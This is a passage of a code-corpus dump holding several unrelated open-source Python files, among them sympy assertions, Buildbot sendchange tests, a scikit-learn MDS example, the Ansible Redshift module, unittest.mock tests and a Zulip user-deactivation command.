assert together(1/(1 + 1/x)) == x/(1 + x)
assert together(x/(1 + 1/x)) == x**2/(1 + x)
assert together(1/x + 1/y + 1/z) == (x*y + x*z + y*z)/(x*y*z)
assert together(1/(1 + x + 1/y + 1/z)) == y*z/(y + z + y*z + x*y*z)
assert together(1/(x*y) + 1/(x*y)**2) == y**(-2)*x**(-2)*(1 + x*y)
assert together(1/(x*y) + 1/(x*y)**4) == y**(-4)*x**(-4)*(1 + x**3*y**3)
assert together(1/(x**7*y) + 1/(x*y)**4) == y**(-4)*x**(-7)*(x**3 + y**3)
assert together(5/(2 + 6/(3 + 7/(4 + 8/(5 + 9/x))))) == \
(S(5)/2)*((171 + 119*x)/(279 + 203*x))
assert together(1 + 1/(x + 1)**2) == (1 + (x + 1)**2)/(x + 1)**2
assert together(1 + 1/(x*(1 + x))) == (1 + x*(1 + x))/(x*(1 + x))
assert together(
1/(x*(x + 1)) + 1/(x*(x + 2))) == (3 + 2*x)/(x*(1 + x)*(2 + x))
assert together(1 + 1/(2*x + 2)**2) == (4*(x + 1)**2 + 1)/(4*(x + 1)**2)
assert together(sin(1/x + 1/y)) == sin(1/x + 1/y)
assert together(sin(1/x + 1/y), deep=True) == sin((x + y)/(x*y))
assert together(1/exp(x) + 1/(x*exp(x))) == (1 + x)/(x*exp(x))
assert together(1/exp(2*x) + 1/(x*exp(3*x))) == (1 + exp(x)*x)/(x*exp(3*x))
assert together(Integral(1/x + 1/y, x)) == Integral((x + y)/(x*y), x)
assert together(Eq(1/x + 1/y, 1 + 1/z)) == Eq((x + y)/(x*y), (z + 1)/z)
assert together((A*B)**-1 + (B*A)**-1) == (A*B)**-1 + (B*A)**-1
|
zozo123/buildbot
|
refs/heads/master
|
master/buildbot/test/unit/test_clients_sendchange.py
|
3
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import mock
from buildbot.clients import sendchange
from twisted.internet import defer
from twisted.internet import reactor
from twisted.spread import pb
from twisted.trial import unittest
class Sender(unittest.TestCase):
def setUp(self):
# patch out some PB components and make up some mocks
self.patch(pb, 'PBClientFactory', self._fake_PBClientFactory)
self.patch(reactor, 'connectTCP', self._fake_connectTCP)
self.factory = mock.Mock(name='PBClientFactory')
self.factory.login = self._fake_login
self.factory.login_d = defer.Deferred()
self.remote = mock.Mock(name='PB Remote')
self.remote.callRemote = self._fake_callRemote
self.remote.broker.transport.loseConnection = self._fake_loseConnection
# results
self.creds = None
self.conn_host = self.conn_port = None
self.lostConnection = False
self.added_changes = []
self.vc_used = None
def _fake_PBClientFactory(self):
return self.factory
def _fake_login(self, creds):
self.creds = creds
return self.factory.login_d
def _fake_connectTCP(self, host, port, factory):
self.conn_host = host
self.conn_port = port
self.assertIdentical(factory, self.factory)
self.factory.login_d.callback(self.remote)
def _fake_callRemote(self, method, change):
self.assertEqual(method, 'addChange')
self.added_changes.append(change)
return defer.succeed(None)
def _fake_loseConnection(self):
self.lostConnection = True
def assertProcess(self, host, port, username, password, changes):
self.assertEqual([host, port, username, password, changes],
[self.conn_host, self.conn_port,
self.creds.username, self.creds.password,
self.added_changes])
def test_send_minimal(self):
s = sendchange.Sender('localhost:1234')
d = s.send('branch', 'rev', 'comm', ['a'])
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project='', repository='', who=None, files=['a'],
comments='comm', branch='branch', revision='rev',
category=None, when=None, properties={}, revlink='',
src=None)])
d.addCallback(check)
return d
def test_send_auth(self):
s = sendchange.Sender('localhost:1234', auth=('me', 'sekrit'))
d = s.send('branch', 'rev', 'comm', ['a'])
def check(_):
self.assertProcess('localhost', 1234, 'me', 'sekrit', [
dict(project='', repository='', who=None, files=['a'],
comments='comm', branch='branch', revision='rev',
category=None, when=None, properties={}, revlink='',
src=None)])
d.addCallback(check)
return d
def test_send_full(self):
s = sendchange.Sender('localhost:1234')
d = s.send('branch', 'rev', 'comm', ['a'], who='me', category='cats',
when=1234, properties={'a': 'b'}, repository='r', vc='git',
project='p', revlink='rl')
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project='p', repository='r', who='me', files=['a'],
comments='comm', branch='branch', revision='rev',
category='cats', when=1234, properties={'a': 'b'},
revlink='rl', src='git')])
d.addCallback(check)
return d
def test_send_files_tuple(self):
# 'buildbot sendchange' sends files as a tuple, rather than a list..
s = sendchange.Sender('localhost:1234')
d = s.send('branch', 'rev', 'comm', ('a', 'b'))
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project='', repository='', who=None, files=['a', 'b'],
comments='comm', branch='branch', revision='rev',
category=None, when=None, properties={}, revlink='',
src=None)])
d.addCallback(check)
return d
def test_send_codebase(self):
s = sendchange.Sender('localhost:1234')
d = s.send('branch', 'rev', 'comm', ['a'], codebase='mycb')
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project='', repository='', who=None, files=['a'],
comments='comm', branch='branch', revision='rev',
category=None, when=None, properties={}, revlink='',
src=None, codebase='mycb')])
d.addCallback(check)
return d
def test_send_unicode(self):
s = sendchange.Sender('localhost:1234')
d = s.send(u'\N{DEGREE SIGN}',
u'\U0001f49e',
u'\N{POSTAL MARK FACE}',
[u'\U0001F4C1'],
project=u'\N{SKULL AND CROSSBONES}',
repository=u'\N{SNOWMAN}',
who=u'\N{THAI CHARACTER KHOMUT}',
category=u'\U0001F640',
when=1234,
properties={u'\N{LATIN SMALL LETTER A WITH MACRON}': 'b'},
revlink=u'\U0001F517')
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project=u'\N{SKULL AND CROSSBONES}',
repository=u'\N{SNOWMAN}',
who=u'\N{THAI CHARACTER KHOMUT}',
files=[u'\U0001F4C1'], # FILE FOLDER
comments=u'\N{POSTAL MARK FACE}',
branch=u'\N{DEGREE SIGN}',
revision=u'\U0001f49e', # REVOLVING HEARTS
category=u'\U0001F640', # WEARY CAT FACE
when=1234,
properties={u'\N{LATIN SMALL LETTER A WITH MACRON}': 'b'},
revlink=u'\U0001F517', # LINK SYMBOL
src=None)])
d.addCallback(check)
return d
def test_send_unicode_utf8(self):
s = sendchange.Sender('localhost:1234')
d = s.send(u'\N{DEGREE SIGN}'.encode('utf8'),
u'\U0001f49e'.encode('utf8'),
u'\N{POSTAL MARK FACE}'.encode('utf8'),
[u'\U0001F4C1'.encode('utf8')],
project=u'\N{SKULL AND CROSSBONES}'.encode('utf8'),
repository=u'\N{SNOWMAN}'.encode('utf8'),
who=u'\N{THAI CHARACTER KHOMUT}'.encode('utf8'),
category=u'\U0001F640'.encode('utf8'),
when=1234,
properties={
u'\N{LATIN SMALL LETTER A WITH MACRON}'.encode('utf8'): 'b'},
revlink=u'\U0001F517'.encode('utf8'))
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project=u'\N{SKULL AND CROSSBONES}',
repository=u'\N{SNOWMAN}',
who=u'\N{THAI CHARACTER KHOMUT}',
files=[u'\U0001F4C1'], # FILE FOLDER
comments=u'\N{POSTAL MARK FACE}',
branch=u'\N{DEGREE SIGN}',
revision=u'\U0001f49e', # REVOLVING HEARTS
category=u'\U0001F640', # WEARY CAT FACE
when=1234,
# NOTE: not decoded!
properties={'\xc4\x81': 'b'},
revlink=u'\U0001F517', # LINK SYMBOL
src=None)])
d.addCallback(check)
return d
def test_send_unicode_latin1(self):
# hand send() a bunch of latin1 strings, and expect them recoded
# to unicode
s = sendchange.Sender('localhost:1234', encoding='latin1')
d = s.send(u'\N{YEN SIGN}'.encode('latin1'),
u'\N{POUND SIGN}'.encode('latin1'),
u'\N{BROKEN BAR}'.encode('latin1'),
[u'\N{NOT SIGN}'.encode('latin1')],
project=u'\N{DEGREE SIGN}'.encode('latin1'),
repository=u'\N{SECTION SIGN}'.encode('latin1'),
who=u'\N{MACRON}'.encode('latin1'),
category=u'\N{PILCROW SIGN}'.encode('latin1'),
when=1234,
properties={
u'\N{SUPERSCRIPT ONE}'.encode('latin1'): 'b'},
revlink=u'\N{INVERTED QUESTION MARK}'.encode('latin1'))
def check(_):
self.assertProcess('localhost', 1234, 'change', 'changepw', [
dict(project=u'\N{DEGREE SIGN}',
repository=u'\N{SECTION SIGN}',
who=u'\N{MACRON}',
files=[u'\N{NOT SIGN}'],
comments=u'\N{BROKEN BAR}',
branch=u'\N{YEN SIGN}',
revision=u'\N{POUND SIGN}',
category=u'\N{PILCROW SIGN}',
when=1234,
# NOTE: not decoded!
properties={'\xb9': 'b'},
revlink=u'\N{INVERTED QUESTION MARK}',
src=None)])
d.addCallback(check)
return d
|
climberwb/video-api
|
refs/heads/master
|
src/billing/__init__.py
|
12133432
| |
vsilent/smarty-bot
|
refs/heads/master
|
core/brain/how/many/__init__.py
|
12133432
| |
TresAmigosSD/SMV
|
refs/heads/master
|
src/test/python/testSmvFramework/hotload/__init__.py
|
12133432
| |
RossBrunton/django
|
refs/heads/master
|
tests/app_loading/__init__.py
|
12133432
| |
watchdogpolska/poradnia.siecobywatelska.pl
|
refs/heads/master
|
poradnia/events/management/__init__.py
|
12133432
| |
synasius/django
|
refs/heads/master
|
tests/view_tests/app5/__init__.py
|
12133432
| |
agconti/njode
|
refs/heads/master
|
env/lib/python2.7/site-packages/django/conf/locale/ru/__init__.py
|
12133432
| |
ProfessionalIT/maxigenios-website
|
refs/heads/master
|
sdk/google_appengine/lib/django-1.2/django/contrib/messages/__init__.py
|
314
|
from api import *
from constants import *
|
ngoix/OCRF
|
refs/heads/master
|
examples/manifold/plot_mds.py
|
45
|
"""
=========================
Multi-dimensional scaling
=========================
An illustration of the metric and non-metric MDS on generated noisy data.
The reconstructed points using the metric MDS and non metric MDS are slightly
shifted to avoid overlapping.
"""
# Author: Nelle Varoquaux <nelle.varoquaux@gmail.com>
# Licence: BSD
print(__doc__)
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.collections import LineCollection
from sklearn import manifold
from sklearn.metrics import euclidean_distances
from sklearn.decomposition import PCA
n_samples = 20
seed = np.random.RandomState(seed=3)
X_true = seed.randint(0, 20, 2 * n_samples).astype(np.float)
X_true = X_true.reshape((n_samples, 2))
# Center the data
X_true -= X_true.mean()
similarities = euclidean_distances(X_true)
# Add noise to the similarities
noise = np.random.rand(n_samples, n_samples)
noise = noise + noise.T
noise[np.arange(noise.shape[0]), np.arange(noise.shape[0])] = 0
similarities += noise
mds = manifold.MDS(n_components=2, max_iter=3000, eps=1e-9, random_state=seed,
dissimilarity="precomputed", n_jobs=1)
pos = mds.fit(similarities).embedding_
nmds = manifold.MDS(n_components=2, metric=False, max_iter=3000, eps=1e-12,
dissimilarity="precomputed", random_state=seed, n_jobs=1,
n_init=1)
npos = nmds.fit_transform(similarities, init=pos)
# Rescale the data
pos *= np.sqrt((X_true ** 2).sum()) / np.sqrt((pos ** 2).sum())
npos *= np.sqrt((X_true ** 2).sum()) / np.sqrt((npos ** 2).sum())
# Rotate the data
clf = PCA(n_components=2)
X_true = clf.fit_transform(X_true)
pos = clf.fit_transform(pos)
npos = clf.fit_transform(npos)
fig = plt.figure(1)
ax = plt.axes([0., 0., 1., 1.])
s = 100
plt.scatter(X_true[:, 0], X_true[:, 1], color='navy', s=s, lw=0,
label='True Position')
plt.scatter(pos[:, 0], pos[:, 1], color='turquoise', s=s, lw=0, label='MDS')
plt.scatter(npos[:, 0], npos[:, 1], color='darkorange', s=s, lw=0, label='NMDS')
plt.legend(scatterpoints=1, loc='best', shadow=False)
similarities = similarities.max() / similarities * 100
similarities[np.isinf(similarities)] = 0
# Plot the edges
start_idx, end_idx = np.where(pos)
# a sequence of (*line0*, *line1*, *line2*), where::
# linen = (x0, y0), (x1, y1), ... (xm, ym)
segments = [[X_true[i, :], X_true[j, :]]
for i in range(len(pos)) for j in range(len(pos))]
values = np.abs(similarities)
lc = LineCollection(segments,
zorder=0, cmap=plt.cm.Blues,
norm=plt.Normalize(0, values.max()))
lc.set_array(similarities.flatten())
lc.set_linewidths(0.5 * np.ones(len(segments)))
ax.add_collection(lc)
plt.show()
|
mgit-at/ansible
|
refs/heads/devel
|
lib/ansible/modules/cloud/amazon/redshift.py
|
50
|
#!/usr/bin/python
# Copyright 2014 Jens Carl, Hothead Games Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
author:
- "Jens Carl (@j-carl), Hothead Games Inc."
module: redshift
version_added: "2.2"
short_description: create, delete, or modify an Amazon Redshift instance
description:
- Creates, deletes, or modifies amazon Redshift cluster instances.
options:
command:
description:
- Specifies the action to take.
required: true
choices: [ 'create', 'facts', 'delete', 'modify' ]
identifier:
description:
- Redshift cluster identifier.
required: true
node_type:
description:
- The node type of the cluster. Must be specified when command=create.
choices: ['ds1.xlarge', 'ds1.8xlarge', 'ds2.xlarge', 'ds2.8xlarge', 'dc1.large', 'dc1.8xlarge', 'dc2.large', 'dc2.8xlarge',
'dw1.xlarge', 'dw1.8xlarge', 'dw2.large', 'dw2.8xlarge']
username:
description:
- Master database username. Used only when command=create.
password:
description:
- Master database password. Used only when command=create.
cluster_type:
description:
- The type of cluster.
choices: ['multi-node', 'single-node' ]
default: 'single-node'
db_name:
description:
- Name of the database.
availability_zone:
description:
- availability zone in which to launch cluster
aliases: ['zone', 'aws_zone']
number_of_nodes:
description:
- Number of nodes. Only used when cluster_type=multi-node.
cluster_subnet_group_name:
description:
- which subnet to place the cluster
aliases: ['subnet']
cluster_security_groups:
description:
- in which security group the cluster belongs
aliases: ['security_groups']
vpc_security_group_ids:
description:
- VPC security group
aliases: ['vpc_security_groups']
skip_final_cluster_snapshot:
description:
- skip a final snapshot before deleting the cluster. Used only when command=delete.
aliases: ['skip_final_snapshot']
default: 'no'
version_added: "2.4"
final_cluster_snapshot_identifier:
description:
- identifier of the final snapshot to be created before deleting the cluster. If this parameter is provided,
final_cluster_snapshot_identifier must be false. Used only when command=delete.
aliases: ['final_snapshot_id']
version_added: "2.4"
preferred_maintenance_window:
description:
- maintenance window
aliases: ['maintance_window', 'maint_window']
cluster_parameter_group_name:
description:
- name of the cluster parameter group
aliases: ['param_group_name']
automated_snapshot_retention_period:
description:
- period when the snapshot take place
aliases: ['retention_period']
port:
description:
- which port the cluster is listining
cluster_version:
description:
- which version the cluster should have
aliases: ['version']
choices: ['1.0']
allow_version_upgrade:
description:
- flag to determinate if upgrade of version is possible
aliases: ['version_upgrade']
default: 'yes'
publicly_accessible:
description:
- if the cluster is accessible publicly or not
default: 'no'
encrypted:
description:
- if the cluster is encrypted or not
default: 'no'
elastic_ip:
description:
- if the cluster has an elastic IP or not
new_cluster_identifier:
description:
- Only used when command=modify.
aliases: ['new_identifier']
wait:
description:
- When command=create, modify or restore then wait for the database to enter the 'available' state. When command=delete wait for the database to be
terminated.
type: bool
default: 'no'
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
requirements: [ 'boto' ]
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Basic cluster provisioning example
- redshift: >
command=create
node_type=ds1.xlarge
identifier=new_cluster
username=cluster_admin
password=1nsecure
# Cluster delete example
- redshift:
command: delete
identifier: new_cluster
skip_final_cluster_snapshot: true
wait: true
'''
RETURN = '''
cluster:
description: dictionary containing all the cluster information
returned: success
type: complex
contains:
identifier:
description: Id of the cluster.
returned: success
type: string
sample: "new_redshift_cluster"
create_time:
description: Time of the cluster creation as timestamp.
returned: success
type: float
sample: 1430158536.308
status:
description: Stutus of the cluster.
returned: success
type: string
sample: "available"
db_name:
description: Name of the database.
returned: success
type: string
sample: "new_db_name"
availability_zone:
description: Amazon availability zone where the cluster is located.
returned: success
type: string
sample: "us-east-1b"
maintenance_window:
description: Time frame when maintenance/upgrade are done.
returned: success
type: string
sample: "sun:09:30-sun:10:00"
private_ip_address:
description: Private IP address of the main node.
returned: success
type: string
sample: "10.10.10.10"
public_ip_address:
description: Public IP address of the main node.
returned: success
type: string
sample: "0.0.0.0"
port:
description: Port of the cluster.
returned: success
type: int
sample: 5439
url:
description: FQDN of the main cluster node.
returned: success
type: string
sample: "new-redshift_cluster.jfkdjfdkj.us-east-1.redshift.amazonaws.com"
'''
import time
try:
import boto.exception
import boto.redshift
except ImportError:
pass # Taken care of by ec2.HAS_BOTO
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import HAS_BOTO, connect_to_aws, ec2_argument_spec, get_aws_connection_info
def _collect_facts(resource):
"""Transfrom cluster information to dict."""
facts = {
'identifier': resource['ClusterIdentifier'],
'create_time': resource['ClusterCreateTime'],
'status': resource['ClusterStatus'],
'username': resource['MasterUsername'],
'db_name': resource['DBName'],
'availability_zone': resource['AvailabilityZone'],
'maintenance_window': resource['PreferredMaintenanceWindow'],
'url': resource['Endpoint']['Address'],
'port': resource['Endpoint']['Port']
}
for node in resource['ClusterNodes']:
if node['NodeRole'] in ('SHARED', 'LEADER'):
facts['private_ip_address'] = node['PrivateIPAddress']
facts['public_ip_address'] = node['PublicIPAddress']
break
return facts
def create_cluster(module, redshift):
"""
Create a new cluster
module: AnsibleModule object
redshift: authenticated redshift connection object
Returns:
"""
identifier = module.params.get('identifier')
node_type = module.params.get('node_type')
username = module.params.get('username')
password = module.params.get('password')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
changed = True
# Package up the optional parameters
params = {}
for p in ('db_name', 'cluster_type', 'cluster_security_groups',
'vpc_security_group_ids', 'cluster_subnet_group_name',
'availability_zone', 'preferred_maintenance_window',
'cluster_parameter_group_name',
'automated_snapshot_retention_period', 'port',
'cluster_version', 'allow_version_upgrade',
'number_of_nodes', 'publicly_accessible',
'encrypted', 'elastic_ip', 'enhanced_vpc_routing'):
if p in module.params:
params[p] = module.params.get(p)
try:
redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
changed = False
except boto.exception.JSONResponseError as e:
try:
redshift.create_cluster(identifier, node_type, username, password, **params)
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
try:
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
if wait:
try:
wait_timeout = time.time() + wait_timeout
time.sleep(5)
while wait_timeout > time.time() and resource['ClusterStatus'] != 'available':
time.sleep(5)
if wait_timeout <= time.time():
module.fail_json(msg="Timeout waiting for resource %s" % resource.id)
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
return(changed, _collect_facts(resource))
def describe_cluster(module, redshift):
"""
Collect data about the cluster.
module: Ansible module object
redshift: authenticated redshift connection object
"""
identifier = module.params.get('identifier')
try:
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
return(True, _collect_facts(resource))
def delete_cluster(module, redshift):
"""
Delete a cluster.
module: Ansible module object
redshift: authenticated redshift connection object
"""
identifier = module.params.get('identifier')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
skip_final_cluster_snapshot = module.params.get('skip_final_cluster_snapshot')
final_cluster_snapshot_identifier = module.params.get('final_cluster_snapshot_identifier')
try:
redshift.delete_cluster(
identifier,
skip_final_cluster_snapshot,
final_cluster_snapshot_identifier
)
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
if wait:
try:
wait_timeout = time.time() + wait_timeout
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
while wait_timeout > time.time() and resource['ClusterStatus'] != 'deleting':
time.sleep(5)
if wait_timeout <= time.time():
module.fail_json(msg="Timeout waiting for resource %s" % resource.id)
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
return(True, {})
def modify_cluster(module, redshift):
"""
Modify an existing cluster.
module: Ansible module object
redshift: authenticated redshift connection object
"""
identifier = module.params.get('identifier')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
# Package up the optional parameters
params = {}
for p in ('cluster_type', 'cluster_security_groups',
'vpc_security_group_ids', 'cluster_subnet_group_name',
'availability_zone', 'preferred_maintenance_window',
'cluster_parameter_group_name',
'automated_snapshot_retention_period', 'port', 'cluster_version',
'allow_version_upgrade', 'number_of_nodes', 'new_cluster_identifier',
'enhanced_vpc_routing'):
if p in module.params:
params[p] = module.params.get(p)
try:
redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
try:
redshift.modify_cluster(identifier, **params)
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
try:
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
if wait:
try:
wait_timeout = time.time() + wait_timeout
time.sleep(5)
while wait_timeout > time.time() and resource['ClusterStatus'] != 'available':
time.sleep(5)
if wait_timeout <= time.time():
module.fail_json(msg="Timeout waiting for resource %s" % resource.id)
resource = redshift.describe_clusters(identifier)['DescribeClustersResponse']['DescribeClustersResult']['Clusters'][0]
except boto.exception.JSONResponseError as e:
# https://github.com/boto/boto/issues/2776 is fixed.
module.fail_json(msg=str(e))
return(True, _collect_facts(resource))
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
command=dict(choices=['create', 'facts', 'delete', 'modify'], required=True),
identifier=dict(required=True),
node_type=dict(choices=['ds1.xlarge', 'ds1.8xlarge', 'ds2.xlarge', 'ds2.8xlarge', 'dc1.large',
'dc2.large', 'dc1.8xlarge', 'dw1.xlarge', 'dw1.8xlarge', 'dw2.large',
'dw2.8xlarge'], required=False),
username=dict(required=False),
password=dict(no_log=True, required=False),
db_name=dict(require=False),
cluster_type=dict(choices=['multi-node', 'single-node', ], default='single-node'),
cluster_security_groups=dict(aliases=['security_groups'], type='list'),
vpc_security_group_ids=dict(aliases=['vpc_security_groups'], type='list'),
skip_final_cluster_snapshot=dict(aliases=['skip_final_snapshot'], type='bool', default=False),
final_cluster_snapshot_identifier=dict(aliases=['final_snapshot_id'], required=False),
cluster_subnet_group_name=dict(aliases=['subnet']),
availability_zone=dict(aliases=['aws_zone', 'zone']),
preferred_maintenance_window=dict(aliases=['maintance_window', 'maint_window']),
cluster_parameter_group_name=dict(aliases=['param_group_name']),
automated_snapshot_retention_period=dict(aliases=['retention_period']),
port=dict(type='int'),
cluster_version=dict(aliases=['version'], choices=['1.0']),
allow_version_upgrade=dict(aliases=['version_upgrade'], type='bool', default=True),
number_of_nodes=dict(type='int'),
publicly_accessible=dict(type='bool', default=False),
encrypted=dict(type='bool', default=False),
elastic_ip=dict(required=False),
new_cluster_identifier=dict(aliases=['new_identifier']),
enhanced_vpc_routing=dict(type='bool', default=False),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=300),
))
required_if = [
('command', 'delete', ['skip_final_cluster_snapshot']),
('skip_final_cluster_snapshot', False, ['final_cluster_snapshot_identifier'])
]
module = AnsibleModule(
argument_spec=argument_spec,
required_if=required_if
)
if not HAS_BOTO:
module.fail_json(msg='boto v2.9.0+ required for this module')
command = module.params.get('command')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg=str("region not specified and unable to determine region from EC2_REGION."))
# connect to the rds endpoint
try:
conn = connect_to_aws(boto.redshift, region, **aws_connect_params)
except boto.exception.JSONResponseError as e:
module.fail_json(msg=str(e))
changed = True
if command == 'create':
(changed, cluster) = create_cluster(module, conn)
elif command == 'facts':
(changed, cluster) = describe_cluster(module, conn)
elif command == 'delete':
(changed, cluster) = delete_cluster(module, conn)
elif command == 'modify':
(changed, cluster) = modify_cluster(module, conn)
module.exit_json(changed=changed, cluster=cluster)
if __name__ == '__main__':
main()
|
40123151ChengYu/2015cd_midterm
|
refs/heads/master
|
static/Brython3.1.1-20150328-091302/Lib/unittest/test/testmock/testwith.py
|
739
|
import unittest
from warnings import catch_warnings
from unittest.test.testmock.support import is_instance
from unittest.mock import MagicMock, Mock, patch, sentinel, mock_open, call
something = sentinel.Something
something_else = sentinel.SomethingElse
class WithTest(unittest.TestCase):
def test_with_statement(self):
with patch('%s.something' % __name__, sentinel.Something2):
self.assertEqual(something, sentinel.Something2, "unpatched")
self.assertEqual(something, sentinel.Something)
def test_with_statement_exception(self):
try:
with patch('%s.something' % __name__, sentinel.Something2):
self.assertEqual(something, sentinel.Something2, "unpatched")
raise Exception('pow')
except Exception:
pass
else:
self.fail("patch swallowed exception")
self.assertEqual(something, sentinel.Something)
def test_with_statement_as(self):
with patch('%s.something' % __name__) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
self.assertTrue(is_instance(mock_something, MagicMock),
"patching wrong type")
self.assertEqual(something, sentinel.Something)
def test_patch_object_with_statement(self):
class Foo(object):
something = 'foo'
original = Foo.something
with patch.object(Foo, 'something'):
self.assertNotEqual(Foo.something, original, "unpatched")
self.assertEqual(Foo.something, original)
def test_with_statement_nested(self):
with catch_warnings(record=True):
with patch('%s.something' % __name__) as mock_something, patch('%s.something_else' % __name__) as mock_something_else:
self.assertEqual(something, mock_something, "unpatched")
self.assertEqual(something_else, mock_something_else,
"unpatched")
self.assertEqual(something, sentinel.Something)
self.assertEqual(something_else, sentinel.SomethingElse)
def test_with_statement_specified(self):
with patch('%s.something' % __name__, sentinel.Patched) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
self.assertEqual(mock_something, sentinel.Patched, "wrong patch")
self.assertEqual(something, sentinel.Something)
def testContextManagerMocking(self):
mock = Mock()
mock.__enter__ = Mock()
mock.__exit__ = Mock()
mock.__exit__.return_value = False
with mock as m:
self.assertEqual(m, mock.__enter__.return_value)
mock.__enter__.assert_called_with()
mock.__exit__.assert_called_with(None, None, None)
def test_context_manager_with_magic_mock(self):
mock = MagicMock()
with self.assertRaises(TypeError):
with mock:
'foo' + 3
mock.__enter__.assert_called_with()
self.assertTrue(mock.__exit__.called)
def test_with_statement_same_attribute(self):
with patch('%s.something' % __name__, sentinel.Patched) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
with patch('%s.something' % __name__) as mock_again:
self.assertEqual(something, mock_again, "unpatched")
self.assertEqual(something, mock_something,
"restored with wrong instance")
self.assertEqual(something, sentinel.Something, "not restored")
def test_with_statement_imbricated(self):
with patch('%s.something' % __name__) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
with patch('%s.something_else' % __name__) as mock_something_else:
self.assertEqual(something_else, mock_something_else,
"unpatched")
self.assertEqual(something, sentinel.Something)
self.assertEqual(something_else, sentinel.SomethingElse)
def test_dict_context_manager(self):
foo = {}
with patch.dict(foo, {'a': 'b'}):
self.assertEqual(foo, {'a': 'b'})
self.assertEqual(foo, {})
with self.assertRaises(NameError):
with patch.dict(foo, {'a': 'b'}):
self.assertEqual(foo, {'a': 'b'})
raise NameError('Konrad')
self.assertEqual(foo, {})
class TestMockOpen(unittest.TestCase):
def test_mock_open(self):
mock = mock_open()
with patch('%s.open' % __name__, mock, create=True) as patched:
self.assertIs(patched, mock)
open('foo')
mock.assert_called_once_with('foo')
def test_mock_open_context_manager(self):
mock = mock_open()
handle = mock.return_value
with patch('%s.open' % __name__, mock, create=True):
with open('foo') as f:
f.read()
expected_calls = [call('foo'), call().__enter__(), call().read(),
call().__exit__(None, None, None)]
self.assertEqual(mock.mock_calls, expected_calls)
self.assertIs(f, handle)
def test_explicit_mock(self):
mock = MagicMock()
mock_open(mock)
with patch('%s.open' % __name__, mock, create=True) as patched:
self.assertIs(patched, mock)
open('foo')
mock.assert_called_once_with('foo')
def test_read_data(self):
mock = mock_open(read_data='foo')
with patch('%s.open' % __name__, mock, create=True):
h = open('bar')
result = h.read()
self.assertEqual(result, 'foo')
if __name__ == '__main__':
unittest.main()
|
udxxabp/zulip
|
refs/heads/master
|
zerver/management/commands/deactivate_user.py
|
116
|
from __future__ import absolute_import
from optparse import make_option
from django.core.management.base import BaseCommand
from zerver.lib.actions import do_deactivate_user, user_sessions
from zerver.models import get_user_profile_by_email, UserProfile
class Command(BaseCommand):
help = "Deactivate a user, including forcibly logging them out."
def add_arguments(self, parser):
parser.add_argument('-f', '--for-real',
dest='for_real',
action='store_true',
default=False,
help="Actually deactivate the user. Default is a dry run.")
parser.add_argument('email', metavar='<email>', type=str,
help='email of user to deactivate')
def handle(self, *args, **options):
user_profile = get_user_profile_by_email(options['email'])
print "Deactivating %s (%s) - %s" % (user_profile.full_name,
user_profile.email,
user_profile.realm.domain)
print "%s has the following active sessions:" % (user_profile.email,)
for session in user_sessions(user_profile):
print session.expire_date, session.get_decoded()
print ""
print "%s has %s active bots that will also be deactivated." % (
user_profile.email,
UserProfile.objects.filter(
is_bot=True, is_active=True, bot_owner=user_profile
).count()
)
if not options["for_real"]:
print "This was a dry run. Pass -f to actually deactivate."
exit(1)
do_deactivate_user(user_profile)
print "Sessions deleted, user deactivated."
|
